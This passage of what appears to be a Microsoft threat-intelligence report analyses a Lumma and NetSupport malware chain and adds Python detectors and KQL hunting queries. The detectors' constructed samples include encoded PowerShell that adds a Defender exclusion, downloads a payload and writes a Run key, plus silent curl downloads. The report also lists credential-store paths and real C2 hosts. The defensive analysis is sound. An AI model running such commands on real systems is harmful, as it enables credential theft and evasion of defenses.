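    """Return the decoded text if value is Base64 of printable text, else None."""
    if not B64_VALUE.match(value):
        return None
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def analyze_proxy_line(line):
    """Return a finding for one log line, or None when nothing looks like Base64 exfiltration."""
    parts = line.split()
    if len(parts) < 4:
        return None
    timestamp, client, _method, url = parts[:4]
    u = urlsplit(url)
    decoded, reasons = {}, []
    for key, value in parse_qsl(u.query, keep_blank_values=True):
        # parse_qsl turns a literal '+' into a space; restore it so Base64 still decodes.
        text = try_decode_base64(value.replace(" ", "+"))
        if text is None:
            continue
        decoded[key] = text
        hits = [m for m in SYSINFO_MARKERS if m in text.lower()]
        if hits:
            reasons.append("parameter %r decodes to system info (%s)" % (key, ", ".join(hits)))
    if not reasons:
        return None
    if IPV4_HOST.match(u.hostname or ""):
        reasons.append("destination is a bare IP address")  # second-stage C2 pattern in the report
    return {"timestamp": timestamp, "client": client, "host": u.hostname,
            "reasons": reasons, "decoded": decoded}


def scan_proxy_log(log_text):
    """Run analyze_proxy_line over every line and keep only the findings."""
    return [f for f in map(analyze_proxy_line, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(finding["timestamp"], finding["client"], "->", finding["host"])
        for reason in finding["reasons"]:
            print("   ", reason)
        print("    decoded:", finding["decoded"])
```

The benign third line also carries a Base64 parameter, but its decoded JSON contains none of the system-information markers, so it produces no finding; the marker list, not the mere presence of Base64, is what keeps this from being noisy.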

Figure 4. Typical format of the URL observed when exfiltrating information collected from the compromised device

Third-stage payload: PowerShell and .exe binary

Depending on the second-stage payload, either one or multiple executables are dropped onto the compromised device, and sometimes an accompanying encoded PowerShell script. These files initiate a chain of events that conduct command execution, payload delivery, defensive evasion, persistence, C2 communications, and data exfiltration. The analysis of the dropped executables is first discussed below, followed by review of the PowerShell scripts observed.

Third-stage .exe analysis

The second-stage payloads run the dropped third-stage executables using the command prompt (for example, cmd.exe /d /s /c ""C:\Users\<user>\AppData\Local\Temp\ApproachAllan.exe""). The /c flag ensures that the command runs and then exits. When the third-stage .exe runs, it drops a command file (.cmd) and launches it using the command prompt (for example, "cmd.exe" /c copy Beauty Beauty.cmd && Beauty.cmd). The .cmd file performs several actions, such as running tasklist to enumerate running programs. This is followed by findstr to search for keywords associated with security software:

findstr keyword | Associated software
wrsa | Webroot SecureAnywhere
opssvc | Quick Heal
AvastUI | Avast Antivirus
AVGUI | AVG Antivirus
bdservicehost | Bitdefender Antivirus
nsWscSvc | Norton Security
ekrn | ESET
SophosHealth | Sophos

The .cmd file also concatenates multiple files into one with a single-character file name: "cmd /c copy /b ..\Verzeichnis + ..\Controlling + ..\Constitute + ..\Enjoyed + ..\Confusion + ..\Min +..\Statutory J". This single-character file name is used next.

Following this, the third-stage .exe produces an AutoIT v3 interpreter file that is renamed from the typical file name of AutoIt3.exe and uses a .com file extension. The .cmd file initiates the execution of the .com file against the single-character binary (such as Briefly.com J). Note that most second-stage payloads follow this progression chain, and, as mentioned, a second-stage payload can also drop multiple executables, all following the same process. For example:

First stage

  • X-essentiApp.exe

Second stage

  • Ionixnignx.exe

Third stage

  • EverybodyViewing.exe
  • ReliefOrganizational.exe
  • InflationWinston.exe

Third-stage command files

  • Beauty.cmd
  • Possess.cmd
  • Villa.cmd

Fourth-stage AutoIT .com files

  • Alexandria.com
  • Kills.com
  • Briefly.com
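
The .cmd, findstr, copy /b, and renamed-AutoIt steps above are individually weak signals (binary concatenation and findstr are common in legitimate scripts), but several of them inside one process tree are not. The following added example, written for this page and not taken from the report, encodes each step as a rule over process-creation events and then groups the hits by the root of the process tree. The event schema (pid, ppid, image, internal_name, cmdline), the process IDs, and the benign events are constructed; the command lines and keywords are modelled on the ones quoted above.

```python
import re
from collections import defaultdict

# Security-software process names the report lists as findstr keywords (lowercased for matching).
AV_KEYWORDS = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost", "nswscsvc", "ekrn", "sophoshealth"}

# "copy <name> <name>.cmd && <name>.cmd": a dropped file renamed to .cmd and run immediately.
COPY_AND_RUN_CMD = re.compile(r"copy\s+(\S+)\s+\1\.cmd\s*&&\s*\1\.cmd", re.IGNORECASE)
# "copy /b a + b + c <target>": binary concatenation of several fragments into one file.
COPY_BINARY = re.compile(r"copy\s+/b\s+(.+?)\s+(\S+)\s*$", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def rules_for_event(ev):
    """Return the names of the third-stage behaviours a single process event exhibits."""
    image = basename(ev["image"]).lower()
    cmd = ev["cmdline"]
    hits = []
    if COPY_AND_RUN_CMD.search(cmd):
        hits.append("copy-and-run-cmd")
    if image == "findstr.exe" and AV_KEYWORDS & set(re.findall(r"[a-z0-9_.-]+", cmd.lower())):
        hits.append("av-discovery-findstr")
    m = COPY_BINARY.search(cmd)
    if m and len(m.group(1).split("+")) >= 3 and len(basename(m.group(2))) == 1:
        hits.append("copy-b-single-char")
    if ev.get("internal_name", "").lower() == "autoit3.exe" and image != "autoit3.exe":
        hits.append("renamed-autoit")
    return hits


def root_of(pid, by_pid):
    """Walk parent links up to the oldest process we have an event for."""
    seen = set()
    while pid not in seen and by_pid[pid]["ppid"] in by_pid:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
    return pid


def evaluate_events(events):
    """Apply the rules to every event; each finding records the root of its process tree."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings = []
    for ev in events:
        for rule in rules_for_event(ev):
            findings.append({"pid": ev["pid"], "rule": rule, "root": root_of(ev["pid"], by_pid)})
    return findings


def suspicious_chains(events, min_rules=2):
    """Group findings per process tree; several distinct behaviours in one tree is the strong signal."""
    rules_by_root = defaultdict(set)
    for f in evaluate_events(events):
        rules_by_root[f["root"]].add(f["rule"])
    return {root: sorted(rules) for root, rules in rules_by_root.items() if len(rules) >= min_rules}


# Constructed process-creation events modelled on the chain described above (not telemetry from the report).
SAMPLE_EVENTS = [
    {"pid": 10, "ppid": 1, "image": "Ionixnignx.exe", "cmdline": "Ionixnignx.exe"},
    {"pid": 11, "ppid": 10, "image": "cmd.exe",
     "cmdline": r'cmd.exe /d /s /c ""C:\Users\u\AppData\Local\Temp\ApproachAllan.exe""'},
    {"pid": 12, "ppid": 11, "image": "ApproachAllan.exe", "cmdline": r"C:\Users\u\AppData\Local\Temp\ApproachAllan.exe"},
    {"pid": 13, "ppid": 12, "image": "cmd.exe", "cmdline": '"cmd.exe" /c copy Beauty Beauty.cmd && Beauty.cmd'},
    {"pid": 14, "ppid": 13, "image": "tasklist.exe", "cmdline": "tasklist"},
    {"pid": 15, "ppid": 13, "image": "findstr.exe",
     "cmdline": 'findstr /I "wrsa opssvc AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"'},
    {"pid": 16, "ppid": 13, "image": "cmd.exe",
     "cmdline": r"cmd /c copy /b ..\Verzeichnis + ..\Controlling + ..\Constitute + ..\Enjoyed + ..\Confusion + ..\Min +..\Statutory J"},
    {"pid": 17, "ppid": 13, "image": "Briefly.com", "internal_name": "AutoIt3.exe", "cmdline": "Briefly.com J"},
    # Benign activity from another tree: a two-part binary copy and a findstr over a log file.
    {"pid": 20, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 21, "ppid": 20, "image": "cmd.exe", "cmdline": "cmd /c copy /b part1 + part2 combined.bin"},
    {"pid": 22, "ppid": 20, "image": "findstr.exe", "cmdline": 'findstr /i "error" app.log'},
]

if __name__ == "__main__":
    for root, rules in suspicious_chains(SAMPLE_EVENTS).items():
        print("process tree rooted at pid %d: %s" % (root, ", ".join(rules)))
```

The per-event rules deliberately stay simple; the correlation by tree root is what turns four noisy rules into one high-confidence alert, and the benign explorer.exe tree with its two-part copy and log search stays silent.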

We observed multiple .com files originating from different dropped executables, each performing distinct functions while occasionally overlapping in behavior. These files facilitate persistence, process injection, remote debugging, and data exfiltration through various mechanisms. One .com file, such as Alexandria.com, drops a .scr file (another renamed AutoIT interpreter), and a .js (JavaScript) file with the same name as the .scr file. The purpose of the JavaScript file is to ensure persistence by creating a .url internet shortcut that points to the JavaScript file and is placed in the Startup folder, ensuring that the .scr file executes when the .js file executes (through Wscript.exe) upon user sign-in. Alternatively, persistence can be achieved using scheduled task creation. The .scr file can initiate C2 connections, enable remote debugging on Chrome or Edge within a hidden desktop session, or create TCP listening sockets on ports 9220-9229. This functionality allows threat actors to monitor browsing activity and interact with an active browser instance. These files can also open sensitive data files, indicating their role in facilitating post-exploitation activities.

Another .com file, such as affiliated.com, also focuses on remote debugging and browser monitoring. In addition to remote monitoring, affiliated.com initiates network connections to Telegram, Let’s Encrypt, and threat actor domains, potentially for C2 or exfiltration. It also accesses DPAPI to decrypt sensitive stored credentials and retrieve browser data.

The final observed .com file, such as Briefly.com, exhibits behavior similar to affiliated.com but extends its capabilities to include screenshot capture, data exfiltration, and PowerShell-based execution. This file accesses browser and user data for collection, establishes connections to Pastebin and additional C2 domains, and drops the fourth-stage PowerShell script.

The order in which these .com files run is not strictly defined, as one or multiple files can perform overlapping functions depending on the third-stage payload. In many cases, the .com files also leverage LOLBAS like RegAsm.exe by dropping a legitimate file into the %TEMP% directory or injecting malicious code into it using NtAllocateVirtualMemory and SetThreadContext API function calls. RegAsm.exe is used to establish C2 connections over TCP ports 15647 or 9000, exfiltrating data, accessing DPAPI for decryption, monitoring keystrokes using the WH_KEYBOARD_LL hook, and more. This flexibility in execution allows threat actors to tailor their approach based on environmental factors, such as security configurations and user activity.

Browser data files seen accessed:

  • \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\cookies.sqlite
  • \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\formhistory.sqlite
  • \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\key4.db
  • \AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\logins.json
  • \AppData\Local\Google\Chrome\User Data\Default\Web Data
  • \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • \AppData\Local\Microsoft\Edge\User Data\Default\Login Data

User data file paths seen accessed:

  • C:\Users\<user>\OneDrive
  • C:\Users\<user>\Documents
  • C:\Users\<user>\Downloads
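
A detection that mirrors the file lists above: flag any process that is not the browser owning a profile directory opening one of these credential or cookie stores, and raise the severity when the process carries the AutoIt3.exe internal name or is one of the LOLBAS binaries named in this section. This is an added example, not Microsoft's detection logic; the event schema and the sample events are constructed, and places.sqlite and cert9.db are taken from the file list in the hunting queries later on this page.

```python
from pathlib import PureWindowsPath

# Profile directories from the report's list of accessed files, mapped to the browser that owns them.
BROWSER_OWNERS = {
    "\\google\\chrome\\user data\\": "chrome.exe",
    "\\microsoft\\edge\\user data\\": "msedge.exe",
    "\\mozilla\\firefox\\profiles\\": "firefox.exe",
}
# Credential and cookie stores named in the report (plus places.sqlite and cert9.db from the hunting query).
SENSITIVE_FILES = {"web data", "login data", "key4.db", "formhistory.sqlite",
                   "cookies.sqlite", "logins.json", "places.sqlite", "cert9.db"}
# LOLBAS binaries the report says were injected into and used to read browser data.
LOLBAS = {"regasm.exe", "msbuild.exe"}


def classify_file_open(event):
    """Return a finding when a process other than the owning browser opens a credential store."""
    path = event["path"].lower()
    owner = next((b for d, b in BROWSER_OWNERS.items() if d in path), None)
    if owner is None or PureWindowsPath(path).name not in SENSITIVE_FILES:
        return None
    proc = event["process"].lower()
    if proc == owner:
        return None  # the browser reading its own profile is expected
    if event.get("internal_name", "").lower() == "autoit3.exe":
        severity, reason = "high", "renamed AutoIt interpreter"
    elif proc in LOLBAS:
        severity, reason = "high", "LOLBAS binary"
    else:
        severity, reason = "medium", "non-browser process"
    return {"process": event["process"], "path": event["path"], "owner": owner,
            "severity": severity, "reason": reason}


def scan_file_opens(events):
    """Keep only the file-open events that classify_file_open considers suspicious."""
    return [f for f in map(classify_file_open, events) if f]


# Constructed file-open events (not telemetry from the report).
U = "C:\\Users\\user\\AppData\\"
SAMPLE_FILE_OPENS = [
    {"process": "chrome.exe", "path": U + "Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"process": "Briefly.com", "internal_name": "AutoIt3.exe",
     "path": U + "Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"process": "RegAsm.exe",
     "path": U + "Roaming\\Mozilla\\Firefox\\Profiles\\abcd1234.default-release\\key4.db"},
    {"process": "backup.exe", "path": U + "Local\\Microsoft\\Edge\\User Data\\Default\\Login Data"},
    {"process": "msedge.exe", "path": U + "Local\\Microsoft\\Edge\\User Data\\Default\\Web Data"},
    {"process": "Briefly.com", "internal_name": "AutoIt3.exe", "path": "C:\\Users\\user\\Documents\\notes.txt"},
]

if __name__ == "__main__":
    for f in scan_file_opens(SAMPLE_FILE_OPENS):
        print("[%s] %s opened %s (%s)" % (f["severity"], f["process"], f["path"], f["reason"]))
```

Matching on the internal file name rather than the on-disk name is the point of the AutoIt rule: the interpreter is renamed to .com or .scr at every stage, but its version resource still says AutoIt3.exe, which is also what the DeviceEvents queries below key on.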

Third-stage PowerShell analysis

If a PowerShell script is also dropped by the second-stage payload, it includes Base64-obfuscated commands to conduct actions such as using curl to download additional files like NetSupport from the C2, creating persistence for the NetSupport RAT, and exfiltrating system information to C2 servers. To ensure that neither errors nor the progress meter are displayed on the compromised device, the curl command is often used with the --silent option when downloading files from the C2. PowerShell is often configured to run without restrictions with the -ExecutionPolicy Bypass parameter.

As an example, in some of the incidents, when the second-stage payload runs, a PowerShell script is dropped and executed. The script sends the compromised device’s name to the C2 and downloads NetSupport RAT from the same C2.

  • Second-stage payload: Squarel.exe
  • PowerShell script: SHA-256: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb
  • C2 domain: keikochio[.]com
  • NetSupport RAT: SHA-256: 32a828e2060e92b799829a12e3e87730e9a88ecfa65a4fc4700bdcc57a52d995

In another case, a second-stage payload drops a PowerShell script that connects to hxxps://ipinfo[.]io to gather the compromised device’s external-facing IP address. This information is sent to a Telegram chat; the script then drops presentationhost.exe (a renamed NetSupport binary) and remcmdstub.exe (NetSupport Command Manager) into the %TEMP% directory. Finally, the PowerShell script establishes persistence for presentationhost.exe by adding it to the auto-start extensibility points (ASEP) registry keys. When it runs, the NetSupport RAT connects to the C2 and captures a screenshot of the compromised device’s desktop. It also delivers a Lumma executable that drops a VBScript file with the same name. The VBScript file runs encoded PowerShell to initiate C2 connections and launches MSBuild.exe to enable Chrome remote debugging on a hidden desktop. Additionally, presentationhost.exe initiates remcmdstub.exe, which leverages iScrPaint.exe (iTop Screen Recorder) to run MSBuild.exe and access browser credential files for exfiltration. The iScrPaint.exe file also establishes persistence by placing a .lnk shortcut in the Windows Startup folder, ensuring it runs on system reboot.

  • Second-stage payload: Application.exe
  • PowerShell script: SHA-256: 483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64
  • C2: hxxp://5.10.250[.]240/fakeurl.htm

The last observed third-stage PowerShell script was dropped by three second-stage payloads. The script sends the compromised device’s name to the C2 server. It then changes the working directory to $env:APPDATA before using Start-BitsTransfer to download NetSupport from the C2. To evade detection, it modifies system security settings to force TLS 1.2 for encrypted C2 communication. The downloaded files are extracted into a newly created WinLibraryClient directory under AppData and then launched. The script establishes persistence for client32.exe (NetSupport RAT) by modifying the ASEP registry. Client32.exe initiates C2 connections to hxxp://79.132.128[.]77/fakeurl.htm.

  • Second-stage payloads: SalmonSamurai.exe, LakerBaker.exe, and DisplayPhotoViewer.exe
  • PowerShell script: SHA-256: 670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c4164856b6
  • C2 domain: stocktemplates[.]net

Additionally, one observed execution included registry enumeration of HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\ to identify installed applications and security software. It also queries the system’s domain status using Windows Management Instrumentation (WMI) and scans for cryptocurrency wallets, including Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey, and BitBox, indicating potential financial data theft.

Fourth-stage PowerShell analysis

Depending on the .com file that ran (like Briefly.com), the renamed AutoIT file may drop a PowerShell script (SHA-256: 2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3). The obfuscated PowerShell code uses the Add-MpPreference cmdlet to add exclusion paths to Microsoft Defender so that the specified folders are not scanned.

Figure 5. Deobfuscated commands to add exclusion paths to Windows Defender

The script above is sometimes followed by an instance of Base64-encoded PowerShell commands. The PowerShell commands perform the following actions:

  • Sends a web request to hxxps://360[.]net and closes the response.
  • Sends a web request to hxxps://baidu[.]com and closes the response.
  • Downloads data from hxxps://klipcatepiu0[.]shop/int_clp_sha.txt using a web client.
  • Writes the downloaded data to a memory stream and saves it as a .zip file named null.zip (SHA-256: f07b8e5622598c228bfc9bff50838a3c4fffd88c436a7ef77e6214a40b0a2bae) in the C:\Users\<Username>\AppData\Local\Temp directory.
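
The third- and fourth-stage PowerShell scripts share a few traits that survive obfuscation: -ExecutionPolicy Bypass, an -EncodedCommand argument (Base64 of UTF-16LE text), curl --silent or Start-BitsTransfer downloads, Add-MpPreference exclusion paths, and writes to the CurrentVersion\Run key. The added example below, written for this page rather than taken from the report, peels the Base64 layers off a command line and checks the decoded text for those traits. The sample command lines, the inner script, and the IP addresses are constructed; the UTF-16LE detection relies on every other byte being NUL, which holds for ASCII scripts.

```python
import base64
import binascii
import re

# PowerShell's -EncodedCommand (and its short forms) takes Base64 of UTF-16LE text.
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# A long Base64-looking token embedded in an already decoded layer (for example inside FromBase64String).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Behaviours described in the report, as regexes over the fully decoded script text.
INDICATORS = [
    ("defender-exclusion", re.compile(r"Add-MpPreference\s+.*-ExclusionPath", re.IGNORECASE)),
    ("policy-bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.IGNORECASE)),
    ("silent-download", re.compile(r"\bcurl(?:\.exe)?\b.*--silent|\bStart-BitsTransfer\b", re.IGNORECASE)),
    ("run-key-persistence", re.compile(r"CurrentVersion\\Run\b", re.IGNORECASE)),
]


def _bytes_to_text(raw):
    """Decode as UTF-16LE when every other byte is NUL (ASCII in UTF-16LE), otherwise as UTF-8."""
    utf16 = len(raw) >= 2 and len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4
    try:
        text = raw.decode("utf-16-le" if utf16 else "utf-8")
    except UnicodeDecodeError:
        return None
    return text if text and all(c.isprintable() or c in "\r\n\t" for c in text) else None


def try_decode_token(token):
    """Base64-decode one token (tolerating missing padding) and turn it into printable text, else None."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    return _bytes_to_text(raw)


def decode_layers(cmdline, max_depth=4):
    """Peel Base64 layers off a command line; returns [original, layer1, layer2, ...]."""
    layers, current = [cmdline], cmdline
    for _ in range(max_depth):
        m = ENC_ARG.search(current)
        tokens = [m.group(1)] if m else B64_TOKEN.findall(current)
        decoded = next((t for t in map(try_decode_token, tokens) if t), None)
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def analyze_command_line(cmdline):
    """Decode all layers and report which of the report's behaviours appear in any of them."""
    layers = decode_layers(cmdline)
    text = "\n".join(layers)
    return {"layers": layers, "indicators": sorted(n for n, rx in INDICATORS if rx.search(text))}


# Constructed samples (not from the report): an encoded script doing what the fourth-stage and
# NetSupport-dropping scripts are described as doing, a benign admin command, and a silent curl.
CONSTRUCTED_INNER = (
    'Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\\Temp"; '
    "Start-BitsTransfer -Source http://198.51.100.7/client.zip -Destination $env:APPDATA; "
    'Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name svc -Value "$env:APPDATA\\client32.exe"'
)
SAMPLE_COMMAND_LINES = [
    "powershell.exe -ExecutionPolicy Bypass -NoProfile -EncodedCommand "
    + base64.b64encode(CONSTRUCTED_INNER.encode("utf-16-le")).decode(),
    'powershell.exe -Command "Get-ChildItem C:\\Logs | Measure-Object"',
    'powershell.exe -NoProfile -c "curl.exe --silent -o $env:TEMP\\x.zip http://203.0.113.9/x.zip"',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyze_command_line(line)
        print("layers decoded: %d, indicators: %s" % (len(result["layers"]) - 1, result["indicators"] or "none"))
```

Running the indicators over every decoded layer at once matters because the traits are split across layers in practice: -ExecutionPolicy Bypass sits on the outer command line while the Defender exclusion and the Run-key write only appear after decoding.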

Recommendations

Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen Microsoft Defender for Endpoint configuration

  • Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
  • Enable network protection in Microsoft Defender for Endpoint.
  • Turn on web protection.
  • Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
  • Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Microsoft Defender XDR customers can turn on the following attack surface reduction rules to prevent common attack techniques used by threat actors.
    • Block executable files from running unless they meet a prevalence, age, or trusted list criterion
    • Block execution of potentially obfuscated scripts
    • Block JavaScript or VBScript from launching downloaded executable content
    • Block process creations originating from PSExec and WMI commands
    • Block credential stealing from the Windows local security authority subsystem
    • Block use of copied or impersonated system tools

Strengthen operating environment configuration

  • Require multifactor authentication (MFA). While certain attacks such as adversary-in-the-middle (AiTM) phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
  • Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Enable Network Level Authentication for Remote Desktop Service connections.
  • Enable Local Security Authority (LSA) protection to block credential stealing from the Windows local security authority subsystem.
  • AppLocker can restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

Microsoft Defender for Endpoint

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.

  • Possible theft of passwords and other sensitive web browser information
  • Possible Lumma Stealer activity
  • Renamed AutoIt tool
  • Use of living-off-the-land binary to run malicious code
  • Suspicious startup item creation
  • Suspicious Scheduled Task Process Launched
  • Suspicious DPAPI Activity
  • Suspicious implant process from a known emerging threat
  • Security software tampering
  • Suspicious activity linked to a financially motivated threat actor detected
  • Ransomware-linked threat actor detected
  • A file or network connection related to a ransomware-linked emerging threat activity group detected
  • Information stealing malware activity
  • Possible NetSupport Manager activity
  • Suspicious sequence of exploration activities
  • Defender detection bypass
  • Suspicious Location of Remote Management Software
  • A process was injected with potentially malicious code
  • Process hollowing detected
  • Suspicious PowerShell download or encoded command execution
  • Suspicious PowerShell command line
  • Suspicious behavior by cmd.exe was observed
  • Suspicious Security Software Discovery
  • Suspicious discovery indicative of Virtualization/Sandbox Evasion
  • A process was launched on a hidden desktop
  • Monitored keystrokes
  • Suspicious Process Discovery
  • Suspicious Javascript process
  • A suspicious file was observed
  • Anomaly detected in ASEP registry

Microsoft Defender for Cloud

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.

  • Detected suspicious combination of HTA and PowerShell
  • Suspicious PowerShell Activity Detected
  • Traffic detected from IP addresses recommended for blocking
  • Attempted communication with suspicious sinkholed domain
  • Communication with suspicious domain identified by threat intelligence
  • Detected obfuscated command line
  • Detected suspicious named pipe communications

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

GitHub-hosted first-stage payload certificate serial numbers

let specificSerialNumbers = dynamic(["70093af339876742820d7941", "15042512e67e8275f3f7f36b", "5608cab7e2ce34d53abcbb73", "0fa27d2553f24da79d1cc6bd8773ee9a", "7a7bf2ae0cbc0f5500db2946", "30d6c83a715bddb32e7956fe52d6b352", "301385aa36fae635e74bb88e", "30013cbbb16a7fd3c57f82707fb99c32", "5d00264a6b804ae6b28d9b16", "3a9c76f8304f77bd271921d9982f1ab6", "01f2c6c363767056abd80e9c", "0b09c88c0c8d15bed51a9eb4440f4bb0"]);
union
(
    DeviceFileCertificateInfo
    | where CertificateSerialNumber in (specificSerialNumbers)
    | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp
),
(
    DeviceTvmCertificateInfo
    | where SerialNumber in (specificSerialNumbers)
    | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate
)

Dropbox-hosted first-stage payload certificate serial number

Surface devices that may contain first-stage payloads hosted on Dropbox related to this activity. This query will search for the unique serial number of the known certificate related to this activity.

let specificSerialNumbers = dynamic(["7a7bf2ae0cbc0f5500db2946"]);
union
(
    DeviceFileCertificateInfo
    | where CertificateSerialNumber in (specificSerialNumbers)
    | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp
),
(
    DeviceTvmCertificateInfo
    | where SerialNumber in (specificSerialNumbers)
    | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate
)

Second-stage C2 IP addresses

Surface devices that may have communicated with second-stage C2 IP addresses related to this activity. The list is a dynamic array, so each column is tested with the in operator rather than ==.

let ipAddressToSearch = dynamic(["159.100.18.192", "192.142.10.246", "79.133.46.35", "84.200.24.191", "84.200.24.26", "89.187.28.253", "185.92.181.1"]);
union isfuzzy=true
(
    AzureDiagnostics
    | where identity_claim_ipaddr_s in (ipAddressToSearch) or conditions_sourceIP_s in (ipAddressToSearch) or CallerIPAddress in (ipAddressToSearch) or clientIP_s in (ipAddressToSearch) or clientIp_s in (ipAddressToSearch) or primaryIPv4Address_s in (ipAddressToSearch) or conditions_destinationIP_s in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AzureDiagnostics", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields)
),
(
    IdentityQueryEvents
    | where IPAddress in (ipAddressToSearch) or DestinationIPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "IdentityQueryEvents", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query
),
(
    AADSignInEventsBeta
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "AADSignInEventsBeta", IPAddress, AdditionalInfo = UserAgent
),
(
    Heartbeat
    | where ComputerIP in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "Heartbeat", IPAddress = ComputerIP, AdditionalInfo = OSName
),
(
    CloudAppEvents
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp, Table = "CloudAppEvents", IPAddress, AdditionalInfo = UserAgent
),
(
    DeviceNetworkEvents
    | where LocalIP in (ipAddressToSearch) or RemoteIP in (ipAddressToSearch)
    | project Timestamp, Table = "DeviceNetworkEvents", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine
),
(
    AADUserRiskEvents
    | where IpAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AADUserRiskEvents", IPAddress = IpAddress, AdditionalInfo = RiskEventType
),
(
    AADNonInteractiveUserSignInLogs
    | where IPAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "AADNonInteractiveUserSignInLogs", IPAddress, AdditionalInfo = UserAgent
),
(
    MicrosoftAzureBastionAuditLogs
    | where TargetVMIPAddress in (ipAddressToSearch) or ClientIpAddress in (ipAddressToSearch)
    | project Timestamp = TimeGenerated, Table = "MicrosoftAzureBastionAuditLogs", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent
)
| sort by Timestamp desc

Fourth-stage C2 IP addresses

Surface devices that may have communicated with fourth-stage C2 IP addresses related to this activity. As above, each column is tested with the in operator against the dynamic array.

